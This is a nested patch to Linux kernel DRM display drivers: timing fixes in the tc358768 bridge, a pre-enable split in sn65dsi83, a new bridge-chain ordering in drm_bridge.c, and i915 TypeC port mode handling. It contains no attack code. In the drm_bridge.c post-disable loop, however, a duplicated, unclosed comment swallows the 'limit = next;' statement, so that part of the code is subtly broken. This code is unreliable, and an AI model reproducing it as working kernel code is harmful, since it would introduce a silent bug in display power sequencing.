+ 
+ 	/* Parameters for PLL programming */
+ 	u32 fbd;	/* PLL feedback divider */
+@@ -285,12 +288,12 @@ static void tc358768_hw_disable(struct tc358768_priv *priv)
+ 
+ static u32 tc358768_pll_to_pclk(struct tc358768_priv *priv, u32 pll_clk)
+ {
+-	return (u32)div_u64((u64)pll_clk * priv->dsi_lanes, priv->pd_lines);
++	return (u32)div_u64((u64)pll_clk * priv->dsi_lanes, priv->dsi_bpp);
+ }
+ 
+ static u32 tc358768_pclk_to_pll(struct tc358768_priv *priv, u32 pclk)
+ {
+-	return (u32)div_u64((u64)pclk * priv->pd_lines, priv->dsi_lanes);
++	return (u32)div_u64((u64)pclk * priv->dsi_bpp, priv->dsi_lanes);
+ }
+ 
+ static int tc358768_calc_pll(struct tc358768_priv *priv,
+@@ -335,13 +338,17 @@ static int tc358768_calc_pll(struct tc358768_priv *priv,
+ 		u32 fbd;
+ 
+ 		for (fbd = 0; fbd < 512; ++fbd) {
+-			u32 pll, diff;
++			u32 pll, diff, pll_in;
+ 
+ 			pll = (u32)div_u64((u64)refclk * (fbd + 1), divisor);
+ 
+ 			if (pll >= max_pll || pll < min_pll)
+ 				continue;
+ 
++			pll_in = (u32)div_u64((u64)refclk, prd + 1);
++			if (pll_in < 4000000)
++				continue;
++
+ 			diff = max(pll, target_pll) - min(pll, target_pll);
+ 
+ 			if (diff < best_diff) {
+@@ -423,6 +430,7 @@ static int tc358768_dsi_host_attach(struct mipi_dsi_host *host,
+ 	priv->output.panel = panel;
+ 
+ 	priv->dsi_lanes = dev->lanes;
++	priv->dsi_bpp = mipi_dsi_pixel_format_to_bpp(dev->format);
+ 
+ 	/* get input ep (port0/endpoint0) */
+ 	ret = -EINVAL;
+@@ -434,7 +442,7 @@ static int tc358768_dsi_host_attach(struct mipi_dsi_host *host,
+ 	}
+ 
+ 	if (ret)
+-		priv->pd_lines = mipi_dsi_pixel_format_to_bpp(dev->format);
++		priv->pd_lines = priv->dsi_bpp;
+ 
+ 	drm_bridge_add(&priv->bridge);
+ 
+@@ -633,6 +641,7 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	struct mipi_dsi_device *dsi_dev = priv->output.dev;
+ 	unsigned long mode_flags = dsi_dev->mode_flags;
+ 	u32 val, val2, lptxcnt, hact, data_type;
++	s32 raw_val;
+ 	const struct drm_display_mode *mode;
+ 	u32 dsibclk_nsk, dsiclk_nsk, ui_nsk, phy_delay_nsk;
+ 	u32 dsiclk, dsibclk, video_start;
+@@ -737,25 +746,26 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 
+ 	/* 38ns < TCLK_PREPARE < 95ns */
+ 	val = tc358768_ns_to_cnt(65, dsibclk_nsk) - 1;
+-	/* TCLK_PREPARE > 300ns */
+-	val2 = tc358768_ns_to_cnt(300 + tc358768_to_ns(3 * ui_nsk),
+-				  dsibclk_nsk);
+-	val |= (val2 - tc358768_to_ns(phy_delay_nsk - dsibclk_nsk)) << 8;
++	/* TCLK_PREPARE + TCLK_ZERO > 300ns */
++	val2 = tc358768_ns_to_cnt(300 - tc358768_to_ns(2 * ui_nsk),
++				  dsibclk_nsk) - 2;
++	val |= val2 << 8;
+ 	dev_dbg(priv->dev, "TCLK_HEADERCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_TCLK_HEADERCNT, val);
+ 
+-	/* TCLK_TRAIL > 60ns + 3*UI */
+-	val = 60 + tc358768_to_ns(3 * ui_nsk);
+-	val = tc358768_ns_to_cnt(val, dsibclk_nsk) - 5;
++	/* TCLK_TRAIL > 60ns AND TEOT <= 105 ns + 12*UI */
++	raw_val = tc358768_ns_to_cnt(60 + tc358768_to_ns(2 * ui_nsk), dsibclk_nsk) - 5;
++	val = clamp(raw_val, 0, 127);
+ 	dev_dbg(priv->dev, "TCLK_TRAILCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_TCLK_TRAILCNT, val);
+ 
+ 	/* 40ns + 4*UI < THS_PREPARE < 85ns + 6*UI */
+ 	val = 50 + tc358768_to_ns(4 * ui_nsk);
+ 	val = tc358768_ns_to_cnt(val, dsibclk_nsk) - 1;
+-	/* THS_ZERO > 145ns + 10*UI */
+-	val2 = tc358768_ns_to_cnt(145 - tc358768_to_ns(ui_nsk), dsibclk_nsk);
+-	val |= (val2 - tc358768_to_ns(phy_delay_nsk)) << 8;
++	/* THS_PREPARE + THS_ZERO > 145ns + 10*UI */
++	raw_val = tc358768_ns_to_cnt(145 - tc358768_to_ns(3 * ui_nsk), dsibclk_nsk) - 10;
++	val2 = clamp(raw_val, 0, 127);
++	val |= val2 << 8;
+ 	dev_dbg(priv->dev, "THS_HEADERCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_THS_HEADERCNT, val);
+ 
+@@ -771,9 +781,10 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	dev_dbg(priv->dev, "TCLK_POSTCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_TCLK_POSTCNT, val);
+ 
+-	/* 60ns + 4*UI < THS_PREPARE < 105ns + 12*UI */
+-	val = tc358768_ns_to_cnt(60 + tc358768_to_ns(15 * ui_nsk),
+-				 dsibclk_nsk) - 5;
++	/* max(60ns + 4*UI, 8*UI) < THS_TRAILCNT < 105ns + 12*UI */
++	raw_val = tc358768_ns_to_cnt(60 + tc358768_to_ns(18 * ui_nsk),
++				     dsibclk_nsk) - 4;
++	val = clamp(raw_val, 0, 15);
+ 	dev_dbg(priv->dev, "THS_TRAILCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_THS_TRAILCNT, val);
+ 
+@@ -787,7 +798,7 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 
+ 	/* TXTAGOCNT[26:16] RXTASURECNT[10:0] */
+ 	val = tc358768_to_ns((lptxcnt + 1) * dsibclk_nsk * 4);
+-	val = tc358768_ns_to_cnt(val, dsibclk_nsk) - 1;
++	val = tc358768_ns_to_cnt(val, dsibclk_nsk) / 4 - 1;
+ 	val2 = tc358768_ns_to_cnt(tc358768_to_ns((lptxcnt + 1) * dsibclk_nsk),
+ 				  dsibclk_nsk) - 2;
+ 	val = val << 16 | val2;
+@@ -867,8 +878,7 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	val = TC358768_DSI_CONFW_MODE_SET | TC358768_DSI_CONFW_ADDR_DSI_CONTROL;
+ 	val |= (dsi_dev->lanes - 1) << 1;
+ 
+-	if (!(dsi_dev->mode_flags & MIPI_DSI_MODE_LPM))
+-		val |= TC358768_DSI_CONTROL_TXMD;
++	val |= TC358768_DSI_CONTROL_TXMD;
+ 
+ 	if (!(mode_flags & MIPI_DSI_CLOCK_NON_CONTINUOUS))
+ 		val |= TC358768_DSI_CONTROL_HSCKMD;
+@@ -914,6 +924,44 @@ static void tc358768_bridge_enable(struct drm_bridge *bridge)
+ 	}
+ }
+ 
++#define MAX_INPUT_SEL_FORMATS	1
++
++static u32 *
++tc358768_atomic_get_input_bus_fmts(struct drm_bridge *bridge,
++				   struct drm_bridge_state *bridge_state,
++				   struct drm_crtc_state *crtc_state,
++				   struct drm_connector_state *conn_state,
++				   u32 output_fmt,
++				   unsigned int *num_input_fmts)
++{
++	struct tc358768_priv *priv = bridge_to_tc358768(bridge);
++	u32 *input_fmts;
++
++	*num_input_fmts = 0;
++
++	input_fmts = kcalloc(MAX_INPUT_SEL_FORMATS, sizeof(*input_fmts),
++			     GFP_KERNEL);
++	if (!input_fmts)
++		return NULL;
++
++	switch (priv->pd_lines) {
++	case 16:
++		input_fmts[0] = MEDIA_BUS_FMT_RGB565_1X16;
++		break;
++	case 18:
++		input_fmts[0] = MEDIA_BUS_FMT_RGB666_1X18;
++		break;
++	default:
++	case 24:
++		input_fmts[0] = MEDIA_BUS_FMT_RGB888_1X24;
++		break;
++	};
++
++	*num_input_fmts = MAX_INPUT_SEL_FORMATS;
++
++	return input_fmts;
++}
++
+ static const struct drm_bridge_funcs tc358768_bridge_funcs = {
+ 	.attach = tc358768_bridge_attach,
+ 	.mode_valid = tc358768_bridge_mode_valid,
+@@ -921,6 +969,11 @@ static const struct drm_bridge_funcs tc358768_bridge_funcs = {
+ 	.enable = tc358768_bridge_enable,
+ 	.disable = tc358768_bridge_disable,
+ 	.post_disable = tc358768_bridge_post_disable,
++
++	.atomic_duplicate_state = drm_atomic_helper_bridge_duplicate_state,
++	.atomic_destroy_state = drm_atomic_helper_bridge_destroy_state,
++	.atomic_reset = drm_atomic_helper_bridge_reset,
++	.atomic_get_input_bus_fmts = tc358768_atomic_get_input_bus_fmts,
+ };
+ 
+ static const struct drm_bridge_timings default_tc358768_timings = {
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi83.c b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+index 047c14ddbbf11..55efd3eb66723 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi83.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+@@ -321,8 +321,8 @@ static u8 sn65dsi83_get_dsi_div(struct sn65dsi83 *ctx)
+ 	return dsi_div - 1;
+ }
+ 
+-static void sn65dsi83_atomic_enable(struct drm_bridge *bridge,
+-				    struct drm_bridge_state *old_bridge_state)
++static void sn65dsi83_atomic_pre_enable(struct drm_bridge *bridge,
++					struct drm_bridge_state *old_bridge_state)
+ {
+ 	struct sn65dsi83 *ctx = bridge_to_sn65dsi83(bridge);
+ 	struct drm_atomic_state *state = old_bridge_state->base.state;
+@@ -478,17 +478,29 @@ static void sn65dsi83_atomic_enable(struct drm_bridge *bridge,
+ 		dev_err(ctx->dev, "failed to lock PLL, ret=%i\n", ret);
+ 		/* On failure, disable PLL again and exit. */
+ 		regmap_write(ctx->regmap, REG_RC_PLL_EN, 0x00);
++		regulator_disable(ctx->vcc);
+ 		return;
+ 	}
+ 
+ 	/* Trigger reset after CSR register update. */
+ 	regmap_write(ctx->regmap, REG_RC_RESET, REG_RC_RESET_SOFT_RESET);
+ 
++	/* Wait for 10ms after soft reset as specified in datasheet */
++	usleep_range(10000, 12000);
++}
++
++static void sn65dsi83_atomic_enable(struct drm_bridge *bridge,
++				    struct drm_bridge_state *old_bridge_state)
++{
++	struct sn65dsi83 *ctx = bridge_to_sn65dsi83(bridge);
++	unsigned int pval;
++
+ 	/* Clear all errors that got asserted during initialization. */
+ 	regmap_read(ctx->regmap, REG_IRQ_STAT, &pval);
+ 	regmap_write(ctx->regmap, REG_IRQ_STAT, pval);
+ 
+-	usleep_range(10000, 12000);
++	/* Wait for 1ms and check for errors in status register */
++	usleep_range(1000, 1100);
+ 	regmap_read(ctx->regmap, REG_IRQ_STAT, &pval);
+ 	if (pval)
+ 		dev_err(ctx->dev, "Unexpected link status 0x%02x\n", pval);
+@@ -555,6 +567,7 @@ static const struct drm_bridge_funcs sn65dsi83_funcs = {
+ 	.attach			= sn65dsi83_attach,
+ 	.detach			= sn65dsi83_detach,
+ 	.atomic_enable		= sn65dsi83_atomic_enable,
++	.atomic_pre_enable	= sn65dsi83_atomic_pre_enable,
+ 	.atomic_disable		= sn65dsi83_atomic_disable,
+ 	.mode_valid		= sn65dsi83_mode_valid,
+ 
+@@ -695,6 +708,7 @@ static int sn65dsi83_probe(struct i2c_client *client,
+ 
+ 	ctx->bridge.funcs = &sn65dsi83_funcs;
+ 	ctx->bridge.of_node = dev->of_node;
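++	/* The previous bridge (the DSI host side) must be pre_enabled first. */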
++	ctx->bridge.pre_enable_prev_first = true;
+ 	drm_bridge_add(&ctx->bridge);
+ 
+ 	ret = sn65dsi83_host_attach(ctx);
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index 38dab76ae69ea..e2e21ce79510e 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -3404,7 +3404,7 @@ int drm_dp_add_payload_part2(struct drm_dp_mst_topology_mgr *mgr,
+ 
+ 	/* Skip failed payloads */
+ 	if (payload->vc_start_slot == -1) {
+-		drm_dbg_kms(state->dev, "Part 1 of payload creation for %s failed, skipping part 2\n",
++		drm_dbg_kms(mgr->dev, "Part 1 of payload creation for %s failed, skipping part 2\n",
+ 			    payload->port->connector->name);
+ 		return -EIO;
+ 	}
+diff --git a/drivers/gpu/drm/drm_bridge.c b/drivers/gpu/drm/drm_bridge.c
+index 1545c50fd1c8f..7044e339a82cd 100644
+--- a/drivers/gpu/drm/drm_bridge.c
++++ b/drivers/gpu/drm/drm_bridge.c
+@@ -691,6 +691,25 @@ void drm_atomic_bridge_chain_disable(struct drm_bridge *bridge,
+ }
+ EXPORT_SYMBOL(drm_atomic_bridge_chain_disable);
+ 
++static void drm_atomic_bridge_call_post_disable(struct drm_bridge *bridge,
++						struct drm_atomic_state *old_state)
++{
++	if (old_state && bridge->funcs->atomic_post_disable) {
++		struct drm_bridge_state *old_bridge_state;
++
++		old_bridge_state =
++			drm_atomic_get_old_bridge_state(old_state,
++							bridge);
++		if (WARN_ON(!old_bridge_state))
++			return;
++
++		bridge->funcs->atomic_post_disable(bridge,
++						   old_bridge_state);
++	} else if (bridge->funcs->post_disable) {
++		bridge->funcs->post_disable(bridge);
++	}
++}
++
+ /**
+  * drm_atomic_bridge_chain_post_disable - cleans up after disabling all bridges
+  *					  in the encoder chain
+@@ -702,36 +721,86 @@ EXPORT_SYMBOL(drm_atomic_bridge_chain_disable);
+  * starting from the first bridge to the last. These are called after completing
+  * &drm_encoder_helper_funcs.atomic_disable
+  *
++ * If a bridge sets @pre_enable_prev_first, then the @post_disable for that
++ * bridge will be called before the previous one to reverse the @pre_enable
++ * calling direction.
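++ *
++ * For example, with a chain A -> B -> C (A closest to the encoder) where B
++ * sets @pre_enable_prev_first, the post_disable order becomes B, A, C
++ * instead of A, B, C: A must be disabled after B.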
++ *
+  * Note: the bridge passed should be the one closest to the encoder
+  */
+ void drm_atomic_bridge_chain_post_disable(struct drm_bridge *bridge,
+ 					  struct drm_atomic_state *old_state)
+ {
+ 	struct drm_encoder *encoder;
++	struct drm_bridge *next, *limit;
+ 
+ 	if (!bridge)
+ 		return;
+ 
+ 	encoder = bridge->encoder;
++
+ 	list_for_each_entry_from(bridge, &encoder->bridge_chain, chain_node) {
+-		if (bridge->funcs->atomic_post_disable) {
+-			struct drm_bridge_state *old_bridge_state;
++		limit = NULL;
++
++		if (!list_is_last(&bridge->chain_node, &encoder->bridge_chain)) {
++			next = list_next_entry(bridge, chain_node);
++
++			if (next->pre_enable_prev_first) {
++				/* next bridge had requested that prev
++				/* The next bridge requested that the previous
++				 * bridge be enabled first, so it must be
++				 * disabled last
++				limit = next;
++
++				/* Find the next bridge that has NOT requested
++				 * prev to be enabled first / disabled last
++				 */
++				list_for_each_entry_from(next, &encoder->bridge_chain,
++							 chain_node) {
++					if (!next->pre_enable_prev_first) {
++						next = list_prev_entry(next, chain_node);
++						limit = next;
++						break;
++					}
++				}
++
++				/* Call these bridges in reverse order */
++				list_for_each_entry_from_reverse(next, &encoder->bridge_chain,
++								 chain_node) {
++					if (next == bridge)
++						break;
++
++					drm_atomic_bridge_call_post_disable(next,
++									    old_state);
++				}
++			}
++		}
+ 
+-			old_bridge_state =
+-				drm_atomic_get_old_bridge_state(old_state,
+-								bridge);
+-			if (WARN_ON(!old_bridge_state))
+-				return;
++		drm_atomic_bridge_call_post_disable(bridge, old_state);
+ 
+-			bridge->funcs->atomic_post_disable(bridge,
+-							   old_bridge_state);
+-		} else if (bridge->funcs->post_disable) {
+-			bridge->funcs->post_disable(bridge);
+-		}
++		if (limit)
++			/* Jump all bridges that we have already post_disabled */
++			bridge = limit;
+ 	}
+ }
+ EXPORT_SYMBOL(drm_atomic_bridge_chain_post_disable);
+ 
++static void drm_atomic_bridge_call_pre_enable(struct drm_bridge *bridge,
++					      struct drm_atomic_state *old_state)
++{
++	if (old_state && bridge->funcs->atomic_pre_enable) {
++		struct drm_bridge_state *old_bridge_state;
++
++		old_bridge_state =
++			drm_atomic_get_old_bridge_state(old_state,
++							bridge);
++		if (WARN_ON(!old_bridge_state))
++			return;
++
++		bridge->funcs->atomic_pre_enable(bridge, old_bridge_state);
++	} else if (bridge->funcs->pre_enable) {
++		bridge->funcs->pre_enable(bridge);
++	}
++}
++
+ /**
+  * drm_atomic_bridge_chain_pre_enable - prepares for enabling all bridges in
+  *					the encoder chain
+@@ -743,32 +812,60 @@ EXPORT_SYMBOL(drm_atomic_bridge_chain_post_disable);
+  * starting from the last bridge to the first. These are called before calling
+  * &drm_encoder_helper_funcs.atomic_enable
+  *
++ * If a bridge sets @pre_enable_prev_first, then the pre_enable for the
++ * prev bridge will be called before pre_enable of this bridge.
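++ *
++ * For example, with a chain A -> B -> C (A closest to the encoder) where B
++ * sets @pre_enable_prev_first, the pre_enable order becomes C, A, B
++ * instead of the usual C, B, A: A must be enabled before B.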
++ *
+  * Note: the bridge passed should be the one closest to the encoder
+  */
+ void drm_atomic_bridge_chain_pre_enable(struct drm_bridge *bridge,
+ 					struct drm_atomic_state *old_state)
+ {
+ 	struct drm_encoder *encoder;
+-	struct drm_bridge *iter;
++	struct drm_bridge *iter, *next, *limit;
+ 
+ 	if (!bridge)
+ 		return;
+ 
+ 	encoder = bridge->encoder;
++
+ 	list_for_each_entry_reverse(iter, &encoder->bridge_chain, chain_node) {
+-		if (iter->funcs->atomic_pre_enable) {
+-			struct drm_bridge_state *old_bridge_state;
++		if (iter->pre_enable_prev_first) {
++			next = iter;
++			limit = bridge;
++			list_for_each_entry_from_reverse(next,
++							 &encoder->bridge_chain,
++							 chain_node) {
++				if (next == bridge)
++					break;
++
++				if (!next->pre_enable_prev_first) {
++					/* Found first bridge that does NOT
++					 * request prev to be enabled first
++					 */
++					limit = list_prev_entry(next, chain_node);
++					break;
++				}
++			}
++
++			list_for_each_entry_from(next, &encoder->bridge_chain, chain_node) {
++				/* Call pre_enable on the requested prev
++				 * bridges, in chain order.
++				 */
++				if (next == iter)
++					/* Reached the bridge that requested
++					 * prev bridges be enabled first; it
++					 * is pre_enabled right after this
++					 * loop.
++					 */
++					break;
++
++				drm_atomic_bridge_call_pre_enable(next, old_state);
++			}
++		}
+ 
+-			old_bridge_state =
+-				drm_atomic_get_old_bridge_state(old_state,
+-								iter);
+-			if (WARN_ON(!old_bridge_state))
+-				return;
++		drm_atomic_bridge_call_pre_enable(iter, old_state);
+ 
+-			iter->funcs->atomic_pre_enable(iter, old_bridge_state);
+-		} else if (iter->funcs->pre_enable) {
+-			iter->funcs->pre_enable(iter);
+-		}
++		if (iter->pre_enable_prev_first)
++			/* Jump all bridges that we have already pre_enabled */
++			iter = limit;
+ 
+ 		if (iter == bridge)
+ 			break;
+diff --git a/drivers/gpu/drm/drm_gem_vram_helper.c b/drivers/gpu/drm/drm_gem_vram_helper.c
+index 125160b534bef..928e08e0b5b86 100644
+--- a/drivers/gpu/drm/drm_gem_vram_helper.c
++++ b/drivers/gpu/drm/drm_gem_vram_helper.c
+@@ -44,7 +44,7 @@ static const struct drm_gem_object_funcs drm_gem_vram_object_funcs;
+  * the frame's scanout buffer or the cursor image. If there's no more space
+  * left in VRAM, inactive GEM objects can be moved to system memory.
+  *
+- * To initialize the VRAM helper library call drmm_vram_helper_alloc_mm().
++ * To initialize the VRAM helper library call drmm_vram_helper_init().
+  * The function allocates and initializes an instance of &struct drm_vram_mm
+  * in &struct drm_device.vram_mm . Use &DRM_GEM_VRAM_DRIVER to initialize
+  * &struct drm_driver and  &DRM_VRAM_MM_FILE_OPERATIONS to initialize
+@@ -72,7 +72,7 @@ static const struct drm_gem_object_funcs drm_gem_vram_object_funcs;
+  *		// setup device, vram base and size
+  *		// ...
+  *
+- *		ret = drmm_vram_helper_alloc_mm(dev, vram_base, vram_size);
++ *		ret = drmm_vram_helper_init(dev, vram_base, vram_size);
+  *		if (ret)
+  *			return ret;
+  *		return 0;
+@@ -85,7 +85,7 @@ static const struct drm_gem_object_funcs drm_gem_vram_object_funcs;
+  * to userspace.
+  *
+  * You don't have to clean up the instance of VRAM MM.
+- * drmm_vram_helper_alloc_mm() is a managed interface that installs a
++ * drmm_vram_helper_init() is a managed interface that installs a
+  * clean-up handler to run during the DRM device's release.
+  *
+  * For drawing or scanout operations, rsp. buffer objects have to be pinned
+diff --git a/drivers/gpu/drm/i915/display/intel_ddi.c b/drivers/gpu/drm/i915/display/intel_ddi.c
+index 69ecf2a3d6c65..706e2d956801d 100644
+--- a/drivers/gpu/drm/i915/display/intel_ddi.c
++++ b/drivers/gpu/drm/i915/display/intel_ddi.c
+@@ -3579,7 +3579,7 @@ static void intel_ddi_sync_state(struct intel_encoder *encoder,
+ 	enum phy phy = intel_port_to_phy(i915, encoder->port);
+ 
+ 	if (intel_phy_is_tc(i915, phy))
+-		intel_tc_port_sanitize(enc_to_dig_port(encoder));
++		intel_tc_port_sanitize_mode(enc_to_dig_port(encoder));
+ 
+ 	if (crtc_state && intel_crtc_has_dp_encoder(crtc_state))
+ 		intel_dp_sync_state(encoder, crtc_state);
+@@ -3789,11 +3789,17 @@ static void intel_ddi_encoder_destroy(struct drm_encoder *encoder)
+ 
+ static void intel_ddi_encoder_reset(struct drm_encoder *encoder)
+ {
++	struct drm_i915_private *i915 = to_i915(encoder->dev);
+ 	struct intel_dp *intel_dp = enc_to_intel_dp(to_intel_encoder(encoder));
++	struct intel_digital_port *dig_port = enc_to_dig_port(to_intel_encoder(encoder));
++	enum phy phy = intel_port_to_phy(i915, dig_port->base.port);
+ 
+ 	intel_dp->reset_link_params = true;
+ 
+ 	intel_pps_encoder_reset(intel_dp);
++
++	if (intel_phy_is_tc(i915, phy))
++		intel_tc_port_init_mode(dig_port);
+ }
+ 
+ static const struct drm_encoder_funcs intel_ddi_funcs = {
+diff --git a/drivers/gpu/drm/i915/display/intel_display_types.h b/drivers/gpu/drm/i915/display/intel_display_types.h
+index 63b7105e818a6..a8bf91a21cb24 100644
+--- a/drivers/gpu/drm/i915/display/intel_display_types.h
++++ b/drivers/gpu/drm/i915/display/intel_display_types.h
+@@ -1763,6 +1763,7 @@ struct intel_digital_port {
+ 	bool tc_legacy_port:1;
+ 	char tc_port_name[8];
+ 	enum tc_port_mode tc_mode;
++	enum tc_port_mode tc_init_mode;
+ 	enum phy_fia tc_phy_fia;
+ 	u8 tc_phy_fia_idx;
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_psr.c b/drivers/gpu/drm/i915/display/intel_psr.c
+index bf18423c7a005..e2d7c0a6802aa 100644
+--- a/drivers/gpu/drm/i915/display/intel_psr.c
++++ b/drivers/gpu/drm/i915/display/intel_psr.c
+@@ -857,9 +857,9 @@ static bool _compute_psr2_wake_times(struct intel_dp *intel_dp,
+ 	}
+ 
+ 	io_wake_lines = intel_usecs_to_scanlines(
+-		&crtc_state->uapi.adjusted_mode, io_wake_time);
++		&crtc_state->hw.adjusted_mode, io_wake_time);
+ 	fast_wake_lines = intel_usecs_to_scanlines(
+-		&crtc_state->uapi.adjusted_mode, fast_wake_time);
++		&crtc_state->hw.adjusted_mode, fast_wake_time);
+ 
+ 	if (io_wake_lines > max_wake_lines ||
+ 	    fast_wake_lines > max_wake_lines)
+diff --git a/drivers/gpu/drm/i915/display/intel_tc.c b/drivers/gpu/drm/i915/display/intel_tc.c
+index 8d6dac32c8960..bda77828dc95f 100644
+--- a/drivers/gpu/drm/i915/display/intel_tc.c
++++ b/drivers/gpu/drm/i915/display/intel_tc.c
+@@ -5,6 +5,7 @@
+ 
+ #include "i915_drv.h"
+ #include "i915_reg.h"
++#include "intel_de.h"
+ #include "intel_display.h"
+ #include "intel_display_power_map.h"
+ #include "intel_display_types.h"
+@@ -116,6 +117,24 @@ assert_tc_cold_blocked(struct intel_digital_port *dig_port)
+ 	drm_WARN_ON(&i915->drm, !enabled);
+ }
+ 
++static enum intel_display_power_domain
++tc_port_power_domain(struct intel_digital_port *dig_port)
++{
++	struct drm_i915_private *i915 = to_i915(dig_port->base.base.dev);
++	enum tc_port tc_port = intel_port_to_tc(i915, dig_port->base.port);
++
++	return POWER_DOMAIN_PORT_DDI_LANES_TC1 + tc_port - TC_PORT_1;
++}
++
++static void
++assert_tc_port_power_enabled(struct intel_digital_port *dig_port)
++{
++	struct drm_i915_private *i915 = to_i915(dig_port->base.base.dev);
++
++	drm_WARN_ON(&i915->drm,
++		    !intel_display_power_is_enabled(i915, tc_port_power_domain(dig_port)));
++}
++
+ u32 intel_tc_port_get_lane_mask(struct intel_digital_port *dig_port)
+ {
+ 	struct drm_i915_private *i915 = to_i915(dig_port->base.base.dev);
+@@ -683,46 +702,104 @@ static void intel_tc_port_update_mode(struct intel_digital_port *dig_port,
+ 	tc_cold_unblock(dig_port, domain, wref);
+ }
+ 
+-static void
+-intel_tc_port_link_init_refcount(struct intel_digital_port *dig_port,
+-				 int refcount)
++static void __intel_tc_port_get_link(struct intel_digital_port *dig_port)
++{
++	dig_port->tc_link_refcount++;
++}
++
++static void __intel_tc_port_put_link(struct intel_digital_port *dig_port)
++{
++	dig_port->tc_link_refcount--;
++}
++
++static bool tc_port_is_enabled(struct intel_digital_port *dig_port)
+ {
+ 	struct drm_i915_private *i915 = to_i915(dig_port->base.base.dev);
+ 
+-	drm_WARN_ON(&i915->drm, dig_port->tc_link_refcount);
+-	dig_port->tc_link_refcount = refcount;
++	assert_tc_port_power_enabled(dig_port);
++
++	return intel_de_read(i915, DDI_BUF_CTL(dig_port->base.port)) &
++	       DDI_BUF_CTL_ENABLE;
+ }
+ 
+-void intel_tc_port_sanitize(struct intel_digital_port *dig_port)
++/**
++ * intel_tc_port_init_mode: Read out HW state and init the given port's TypeC mode
++ * @dig_port: digital port
++ *
++ * Read out the HW state and initialize the TypeC mode of @dig_port. The mode
++ * will be locked until intel_tc_port_sanitize_mode() is called.
++ */
++void intel_tc_port_init_mode(struct intel_digital_port *dig_port)
+ {
+ 	struct drm_i915_private *i915 = to_i915(dig_port->base.base.dev);
+-	struct intel_encoder *encoder = &dig_port->base;
+ 	intel_wakeref_t tc_cold_wref;
+ 	enum intel_display_power_domain domain;
+-	int active_links = 0;
+ 
+ 	mutex_lock(&dig_port->tc_lock);
+ 
+-	if (dig_port->dp.is_mst)
+-		active_links = intel_dp_mst_encoder_active_links(dig_port);
+-	else if (encoder->base.crtc)
+-		active_links = to_intel_crtc(encoder->base.crtc)->active;
+-
+ 	drm_WARN_ON(&i915->drm, dig_port->tc_mode != TC_PORT_DISCONNECTED);
+ 	drm_WARN_ON(&i915->drm, dig_port->tc_lock_wakeref);
++	drm_WARN_ON(&i915->drm, dig_port->tc_link_refcount);
+ 
+ 	tc_cold_wref = tc_cold_block(dig_port, &domain);
+ 
+ 	dig_port->tc_mode = intel_tc_port_get_current_mode(dig_port);
++	/*
++	 * Save the initial mode for the state check in
++	 * intel_tc_port_sanitize_mode().
++	 */
++	dig_port->tc_init_mode = dig_port->tc_mode;
++	dig_port->tc_lock_wakeref = tc_cold_block(dig_port, &dig_port->tc_lock_power_domain);
++
++	/*
++	 * The PHY needs to be connected for AUX to work during HW readout and
++	 * MST topology resume, but the PHY mode can only be changed if the
++	 * port is disabled.
++	 */
++	if (!tc_port_is_enabled(dig_port))
++		intel_tc_port_update_mode(dig_port, 1, false);
++
++	/* Prevent changing dig_port->tc_mode until intel_tc_port_sanitize_mode() is called. */
++	__intel_tc_port_get_link(dig_port);
++
++	tc_cold_unblock(dig_port, domain, tc_cold_wref);
++
++	drm_dbg_kms(&i915->drm, "Port %s: init mode (%s)\n",
++		    dig_port->tc_port_name,
++		    tc_port_mode_name(dig_port->tc_mode));
++
++	mutex_unlock(&dig_port->tc_lock);
++}
++
++/**
++ * intel_tc_port_sanitize_mode: Sanitize the given port's TypeC mode
++ * @dig_port: digital port
++ *
++ * Sanitize @dig_port's TypeC mode wrt. the encoder's state right after driver
++ * loading and system resume:
++ * If the encoder is enabled keep the TypeC mode/PHY connected state locked until
++ * the encoder is disabled.
++ * If the encoder is disabled make sure the PHY is disconnected.
++ */
++void intel_tc_port_sanitize_mode(struct intel_digital_port *dig_port)
++{
++	struct drm_i915_private *i915 = to_i915(dig_port->base.base.dev);
++	struct intel_encoder *encoder = &dig_port->base;
++	int active_links = 0;
++
++	mutex_lock(&dig_port->tc_lock);
++
++	if (dig_port->dp.is_mst)
++		active_links = intel_dp_mst_encoder_active_links(dig_port);
++	else if (encoder->base.crtc)
++		active_links = to_intel_crtc(encoder->base.crtc)->active;
++
++	drm_WARN_ON(&i915->drm, dig_port->tc_link_refcount != 1);
+ 	if (active_links) {
+ 		if (!icl_tc_phy_is_connected(dig_port))
+ 			drm_dbg_kms(&i915->drm,
+ 				    "Port %s: PHY disconnected with %d active link(s)\n",
+ 				    dig_port->tc_port_name, active_links);
+-		intel_tc_port_link_init_refcount(dig_port, active_links);
+-
+-		dig_port->tc_lock_wakeref = tc_cold_block(dig_port,
+-							  &dig_port->tc_lock_power_domain);
+ 	} else {
+ 		/*
+ 		 * TBT-alt is the default mode in any case the PHY ownership is not
+@@ -730,15 +807,17 @@ void intel_tc_port_sanitize(struct intel_digital_port *dig_port)
+ 		 * we'll just switch to disconnected mode from it here without
+ 		 * a note.
+ 		 */
+-		if (dig_port->tc_mode != TC_PORT_TBT_ALT)
++		if (dig_port->tc_init_mode != TC_PORT_TBT_ALT)
+ 			drm_dbg_kms(&i915->drm,
+ 				    "Port %s: PHY left in %s mode on disabled port, disconnecting it\n",
+ 				    dig_port->tc_port_name,
+-				    tc_port_mode_name(dig_port->tc_mode));
++				    tc_port_mode_name(dig_port->tc_init_mode));
+ 		icl_tc_phy_disconnect(dig_port);
+-	}
